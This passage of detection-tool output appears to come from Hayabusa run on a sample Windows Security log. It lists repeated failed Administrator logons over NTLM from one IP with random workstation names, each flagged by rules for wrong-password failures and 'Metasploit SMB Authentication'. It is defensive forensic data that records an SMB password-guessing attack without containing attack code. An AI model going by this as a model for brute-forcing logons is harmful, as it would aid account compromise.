NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
